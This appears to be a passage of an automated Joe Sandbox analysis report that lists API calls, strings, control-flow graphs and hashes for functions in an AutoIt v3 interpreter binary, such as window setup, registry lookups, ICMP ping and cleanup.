                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: 6227f1f0e391864e34b9b0a33b919ce3ae11f88e520940675b69e707aeea10b5
                          • Instruction ID: 5b30006e212f2295e0c4e82f6d6fb54350564b8f4723181991aa9ba482d60b82
                          • Opcode Fuzzy Hash: 6227f1f0e391864e34b9b0a33b919ce3ae11f88e520940675b69e707aeea10b5
                          • Instruction Fuzzy Hash: 3C315C70855309AFDB50CFA4DC88ADD7FF0FB19310F10415AF540A62A0D3B5054ADF51
                          Function 00513411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00513444
                          • RegisterClassExW.USER32(00000030), ref: 0051346E
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                          • InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                          • LoadIconW.USER32(000000A9), ref: 005134C2
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: 745863b67f0596b15bdde9b24f4d45fd0a973e5b8c88d2d7506ed1cf3869fbe3
                          • Instruction ID: 1a6fc76824f309a6b5340ac9186b926ef37df4b3dd726fdd475d662ebba21309
                          • Opcode Fuzzy Hash: 745863b67f0596b15bdde9b24f4d45fd0a973e5b8c88d2d7506ed1cf3869fbe3
                          • Instruction Fuzzy Hash: 6121E3B1911218AFEB109FA4E888B9EBBF4FB19700F00511BF511A62A0D7B11549EF91
                          Function 00522FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0052FFFA: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00523094), ref: 00530018
                            • Part of subcall function 005307EC: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0052309F), ref: 0053080E
                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005230E2
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0056013A
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0056017B
                          • RegCloseKey.ADVAPI32(?), ref: 005601B9
                          • _wcscat.LIBCMT ref: 00560212
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                          • API String ID: 2673923337-2727554177
                          • Opcode ID: 7bf9d4f85ab64357cc5dda49299f563e1f5eec61a11894220772cd59b1e5444b
                          • Instruction ID: afd83a14e63291ab96b4384b89e6413bba437ee0747bced6a04eb3a69a67adee
                          • Opcode Fuzzy Hash: 7bf9d4f85ab64357cc5dda49299f563e1f5eec61a11894220772cd59b1e5444b
                          • Instruction Fuzzy Hash: 42716D754093569EC324EF25EC5996BBFE8FFA9340F80092FF445932A0EB309948DB95
                          Function 0052514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00525156
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00525165
                          • LoadIconW.USER32(00000063), ref: 0052517C
                          • LoadIconW.USER32(000000A4), ref: 0052518E
                          • LoadIconW.USER32(000000A2), ref: 005251A0
                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
                          • RegisterClassExW.USER32(?), ref: 0052521C
                            • Part of subcall function 00513411: GetSysColorBrush.USER32(0000000F), ref: 00513444
                            • Part of subcall function 00513411: RegisterClassExW.USER32(00000030), ref: 0051346E
                            • Part of subcall function 00513411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
                            • Part of subcall function 00513411: InitCommonControlsEx.COMCTL32(?), ref: 0051349C
                            • Part of subcall function 00513411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005134AC
                            • Part of subcall function 00513411: LoadIconW.USER32(000000A9), ref: 005134C2
                            • Part of subcall function 00513411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005134D1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$AutoIt v3
                          • API String ID: 423443420-4155596026
                          • Opcode ID: db00d5c77bbaf5fe677f10e98c5cf109db566d0212862cc343beda35e558c3d4
                          • Instruction ID: 2aca9dd3e4651bd6159cae459161c4d2e30c4db6327acd7541235c85005349b8
                          • Opcode Fuzzy Hash: db00d5c77bbaf5fe677f10e98c5cf109db566d0212862cc343beda35e558c3d4
                          • Instruction Fuzzy Hash: 4C216874D12308AFEB209FA4EC19B9D7FB4FB29311F00012BE504A62E0D3B65559EF81
                          Function 00585BE2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 924 585be2-585c19 call 514dc0 927 585c39-585c4b WSAStartup 924->927 928 585c1b-585c28 call 51502b 924->928 929 585c4d-585c5d call 566f18 927->929 930 585c62-585ca0 call 5240cd call 514d37 call 52402a inet_addr gethostbyname 927->930 928->927 937 585c2a-585c35 call 51502b 928->937 938 585dbb-585dc3 929->938 945 585cb1-585cc1 call 566f18 930->945 946 585ca2-585caf IcmpCreateFile 930->946 937->927 952 585db2-585db6 call 521cb6 945->952 946->945 947 585cc6-585cf7 call 530f16 call 52433f 946->947 956 585cf9-585d18 IcmpSendEcho 947->956 957 585d1a-585d2e IcmpSendEcho 947->957 952->938 958 585d32-585d34 956->958 957->958 959 585d36-585d3b 958->959 960 585d67-585d69 958->960 961 585d3d-585d42 959->961 962 585d7f-585d91 call 514dc0 959->962 963 585d6b-585d77 call 566f18 960->963 965 585d79-585d7d 961->965 966 585d44-585d49 961->966 972 585d93-585d95 962->972 973 585d97 962->973 971 585d99-585dad IcmpCloseHandle WSACleanup call 5245ae 963->971 965->963 966->960 970 585d4b-585d50 966->970 974 585d5f-585d65 970->974 975 585d52-585d57 970->975 971->952 972->971 973->971 974->963 975->965 977 585d59-585d5d 975->977 977->963
                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00585C43
                          • inet_addr.WSOCK32(?,?,?), ref: 00585C88
                          • gethostbyname.WS2_32(?), ref: 00585C94
                          • IcmpCreateFile.IPHLPAPI ref: 00585CA2
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585D12
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00585D28
                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00585D9D
                          • WSACleanup.WSOCK32 ref: 00585DA3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 4b19a1e4ec6cee81364acc3889acc2bc2aa6f002e739800ebf1c88f230630654
                          • Instruction ID: a892cb43a2c8a1086e42ae39c6d7951c46f7b6312feb17685e304c499ee6b034
                          • Opcode Fuzzy Hash: 4b19a1e4ec6cee81364acc3889acc2bc2aa6f002e739800ebf1c88f230630654
                          • Instruction Fuzzy Hash: A1514A716047019FDB20AF24DC49B6ABBE4BF89710F044929F956AB2E1EB30ED459F81
                          Function 00524D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 978 524d83-524dd1 980 524dd3-524dd6 978->980 981 524e31-524e33 978->981 982 524e37 980->982 983 524dd8-524ddf 980->983 981->980 984 524e35 981->984 985 560942-560970 call 51c460 call 51c483 982->985 986 524e3d-524e40 982->986 987 524de5-524dea 983->987 988 524ead-524eb5 PostQuitMessage 983->988 989 524e1a-524e22 DefWindowProcW 984->989 1025 560975-56097c 985->1025 990 524e42-524e43 986->990 991 524e65-524e8c SetTimer RegisterWindowMessageW 986->991 992 524df0-524df2 987->992 993 5609b5-5609c9 call 572b3a 987->993 996 524e61-524e63 988->996 995 524e28-524e2e 989->995 997 5608e5-5608e8 990->997 998 524e49-524e5c KillTimer call 525ac3 call 5134e4 990->998 991->996 999 524e8e-524e99 CreatePopupMenu 991->999 1000 524eb7-524ec1 call 525b29 992->1000 1001 524df8-524dfd 992->1001 993->996 1018 5609cf 993->1018 996->995 1004 56091e-56093d MoveWindow 997->1004 1005 5608ea-5608ec 997->1005 998->996 999->996 1020 524ec6 1000->1020 1007 524e03-524e08 1001->1007 1008 56099a-5609a1 1001->1008 1004->996 1012 5608ee-5608f1 1005->1012 1013 56090d-560919 SetFocus 1005->1013 1016 524e9b-524eab call 525bd7 1007->1016 1017 524e0e-524e14 1007->1017 1008->989 1015 5609a7-5609b0 call 568637 1008->1015 1012->1017 1021 5608f7-560908 call 51c460 1012->1021 1013->996 1015->989 1016->996 1017->989 1017->1025 1018->989 1020->996 1021->996 1025->989 1029 560982-560995 call 525ac3 call 5259d3 1025->1029 1029->989
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?), ref: 00524E22
                          • KillTimer.USER32(?,00000001), ref: 00524E4C
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00524E6F
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00524E7A
                          • CreatePopupMenu.USER32 ref: 00524E8E
                          • PostQuitMessage.USER32(00000000), ref: 00524EAF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                          • String ID: TaskbarCreated
                          • API String ID: 129472671-2362178303
                          • Opcode ID: 8ff37ae5887bc5d24885df1a48202462e4b3c2e65293840fb38cbc6af8e896a3
                          • Instruction ID: 061fde5774f36b60240dbc5e1224e83e9041f6e067b2cb4e81c490c90b14dca9
                          • Opcode Fuzzy Hash: 8ff37ae5887bc5d24885df1a48202462e4b3c2e65293840fb38cbc6af8e896a3
                          • Instruction Fuzzy Hash: E341F531215129ABFF255F28BC09B7E3F99FF52300F05052BF502922E1DBB0AC55AB62
                          Function 0051AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1035 51ad98-51add1 1036 552e93-552e94 DestroyWindow 1035->1036 1037 51add7-51aded mciSendStringW 1035->1037 1043 552e9f-552eac 1036->1043 1038 51afc0-51afcd 1037->1038 1039 51adf3-51adfb 1037->1039 1040 51aff2-51aff9 1038->1040 1041 51afcf-51afea UnregisterHotKey 1038->1041 1042 51ae01-51ae10 call 51c71f 1039->1042 1039->1043 1040->1039 1045 51afff 1040->1045 1041->1040 1044 51afec-51afed call 530cfc 1041->1044 1056 51ae16-51ae1e 1042->1056 1057 552ee9-552ef5 1042->1057 1047 552eae-552eb1 1043->1047 1048 552edb-552ee2 1043->1048 1044->1040 1045->1038 1052 552eb3-552ebb call 5242cf 1047->1052 1053 552ebd-552ec0 FindClose 1047->1053 1048->1043 1050 552ee4 1048->1050 1050->1057 1055 552ec6-552ed3 1052->1055 1053->1055 1055->1048 1059 552ed5-552ed6 call 57a079 1055->1059 1062 51ae24-51ae49 call 514dc0 1056->1062 1063 552f0d-552f1a 1056->1063 1060 552ef7-552ef9 FreeLibrary 1057->1060 1061 552eff-552f06 1057->1061 1059->1048 1060->1061 1061->1057 1065 552f08 1061->1065 1072 51ae80-51ae8b OleUninitialize 1062->1072 1073 51ae4b 1062->1073 1067 552f41-552f48 1063->1067 1068 552f1c-552f39 VirtualFree 1063->1068 1065->1063 1067->1063 1070 552f4a 1067->1070 1068->1067 1069 552f3b-552f3c call 57a0d3 1068->1069 1069->1067 1076 552f4f-552f52 1070->1076 1072->1076 1077 51ae91-51ae96 1072->1077 1075 51ae4e-51ae7e call 52fc8b call 52fd20 1073->1075 1075->1072 1076->1077 1079 552f58-552f5e 1076->1079 1080 552f63-552f70 call 57a0ad 1077->1080 1081 51ae9c-51aea6 1077->1081 1079->1077 1094 552f72 1080->1094 1083 51b001-51b00e call 5309e7 1081->1083 1084 51aeac-51af22 call 521cb6 call 52fe1c call 524c0a call 53045a call 521cb6 call 514dc0 call 5308b4 call 530a7a * 3 1081->1084 1083->1084 1095 51b014 1083->1095 1098 552f77-552f84 call 56d3ae 1084->1098 1128 51af28-51af3b call 5113ae 1084->1128 1094->1098 1095->1083 1104 552f86 1098->1104 1107 552f8b-552f98 call 53030e 1104->1107 1113 552f9a 1107->1113 1116 552f9f-552fac call 567019 1113->1116 1122 552fae 1116->1122 1125 552fb3-552fc0 call 57a091 1122->1125 1130 552fc2 1125->1130 1128->1107 1133 51af41-51af49 1128->1133 1134 552fc7-552fd4 call 57a091 1130->1134 1133->1116 1135 51af4f-51af6d call 521cb6 call 523868 1133->1135 1140 552fd6 1134->1140 1135->1125 1143 51af73-51af81 1135->1143 1140->1140 1143->1134 1144 51af87-51afbf call 521cb6 * 3 call 53027c 1143->1144
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0051ADE1
                          • OleUninitialize.OLE32(?,00000000), ref: 0051AE80
                          • UnregisterHotKey.USER32(?), ref: 0051AFD7
                          • DestroyWindow.USER32(?), ref: 00552E94
                          • FreeLibrary.KERNEL32(?), ref: 00552EF9
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00552F26
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: fc3dd6f3bdef311bc96863936918f314fe05898e5ec8721edb81b8dc3d1fc105
                          • Instruction ID: de60f77841b74f5a44908693832354b848a6e222888c757d766d8d124fa2eec0
                          • Opcode Fuzzy Hash: fc3dd6f3bdef311bc96863936918f314fe05898e5ec8721edb81b8dc3d1fc105
                          • Instruction Fuzzy Hash: C9A19134702213CFDB29EF10D4A9A69FB64FF55701F1046ADE80AAB291CB31AD56CF91
                          Function 005256F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00560BDB
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • _memset.LIBCMT ref: 00525787
                          • _wcscpy.LIBCMT ref: 005257DB
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
                          • __swprintf.LIBCMT ref: 00560C51
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                          • String ID: Line %d: $2#2#$AutoIt -
                          • API String ID: 230667853-2022516920
                          • Opcode ID: 26bf8f83cf9cbb7228390a395c325147589cd47e015360a460685c151034deb2
                          • Instruction ID: d8243785974a1f0be6b28bb9f67b332c0012febe1ceff35d97a199ebac99091a
                          • Opcode Fuzzy Hash: 26bf8f83cf9cbb7228390a395c325147589cd47e015360a460685c151034deb2
                          • Instruction Fuzzy Hash: 4F41C671008711AAC321EB60EC49BEF7FECBFA5354F04461EF185920E1EB309649CB96
                          Function 0051AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530717
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(00000010,00000000), ref: 0053071F
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(000000A0,00000000), ref: 0053072A
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00530735
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(00000011,00000000), ref: 0053073D
                            • Part of subcall function 005306E6: MapVirtualKeyW.USER32(00000012,00000000), ref: 00530745
                            • Part of subcall function 0052FE77: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0051AC6B), ref: 0052FED2
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051AD08
                          • OleInitialize.OLE32(00000000), ref: 0051AD85
                          • CloseHandle.KERNEL32(00000000), ref: 00552E86
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                          • String ID: <g]$\d]$c]
                          • API String ID: 1986988660-1543504256
                          • Opcode ID: f773520aed3b6878f3e866fd91dd39d0b9ae12798feeb3a45e9421a2548c36e9
                          • Instruction ID: 992b1a8df9d10a0501ecb63a50e378979bcc9779cbf32129499c67c40fca0589
                          • Opcode Fuzzy Hash: f773520aed3b6878f3e866fd91dd39d0b9ae12798feeb3a45e9421a2548c36e9
                          • Instruction Fuzzy Hash: F281BCB09022458ECBA4DF79FA956197FE4FBA9308710852BD019C73A2EB71444EEF15
                          Function 005250DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1431 5250db-52514b CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
                          • ShowWindow.USER32(00000000), ref: 0052513E
                          • ShowWindow.USER32(00000000), ref: 00525147
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 8927907f5cb2ee1da862cbedcc12e3aae099c45e73484280ea880e3c61acb976
                          • Instruction ID: 752c8365c6c05f052ffd9104f185cda9c095afcd449f4544342bacb4469022dd
                          • Opcode Fuzzy Hash: 8927907f5cb2ee1da862cbedcc12e3aae099c45e73484280ea880e3c61acb976
                          • Instruction Fuzzy Hash: 06F0DA796522947EEA3157276C48E373F7DE7D7F50F00412BB900A31B0C6B51856EAB0
                          Function 00579983 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C4E
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C61
                          • _free.LIBCMT ref: 00579ACC
                          • _free.LIBCMT ref: 00579AD3
                          • _free.LIBCMT ref: 00579B3E
                            • Part of subcall function 00532EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EC9
                            • Part of subcall function 00532EB5: GetLastError.KERNEL32(00000000,?,00539B84,00000000,00538C8D,005358F3), ref: 00532EDB
                          • _free.LIBCMT ref: 00579B46
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 1552873950-2806939583
                          • Opcode ID: 2b461b8dfd915b2ff92ab1303c2889b700f57624d398c132f22d5241af375ee2
                          • Instruction ID: 76de1637de45bb788c8e824b94d6a66bb86d02777840fb7c0c56770f13fdc172
                          • Opcode Fuzzy Hash: 2b461b8dfd915b2ff92ab1303c2889b700f57624d398c132f22d5241af375ee2
                          • Instruction Fuzzy Hash: E1513FB1D04219AFDF24DF64EC45AAEBBB9FF88304F10449EB609A3281D7715A84DF58
                          Function 0053556D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                          • String ID:
                          • API String ID: 1559183368-0
                          • Opcode ID: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
                          • Instruction ID: 972f65be16eccd642fc99c3658250b4082152d3806bea944cdeaab97e3dcb2a1
                          • Opcode Fuzzy Hash: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
